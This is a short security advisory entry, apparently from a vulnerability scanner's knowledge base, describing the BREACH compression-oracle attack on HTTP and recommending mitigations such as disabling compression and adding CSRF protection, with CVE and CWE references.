BREACH attack

Description

BREACH is a variant of the CRIME attack that targets HTTP compression, specifically gzip or DEFLATE algorithms used via the content-encoding option within HTTP. Attackers exploit this compression oracle to extract sensitive information, such as session cookies, by performing a series of brute-force and divide-and-conquer searches. This attack poses a threat to confidentiality and can lead to the compromise of sensitive data.

Recommendation

To mitigate BREACH attacks, disable HTTP compression entirely or selectively on pages where sensitive information like session cookies is transmitted. Implement CSRF protection methods as an additional mitigation strategy. Consider disabling compression when the referrer header indicates a cross-site request or when the header is absent.

References

• Wikipedia: BREACH
• BREACH attack
• CVE-2013-3587
• CWE-16
• CWE-310
• CAPEC-310
• OWASP 2021-A2
• OWASP 2021-A5
• OWASP 2021-A6

Related Issues

• CRIME (SPDY) attack - CVE-2012-4930
• CRIME (SSL/TLS) attack - CVE-2012-4929
• The POODLE attack - CVE-2014-3566
• No Redirection from HTTP to HTTPS - Vulnerability

Tags:

BREACH

CRIME

CSRF

SSL/TLS

Encryption

Server Misconfiguration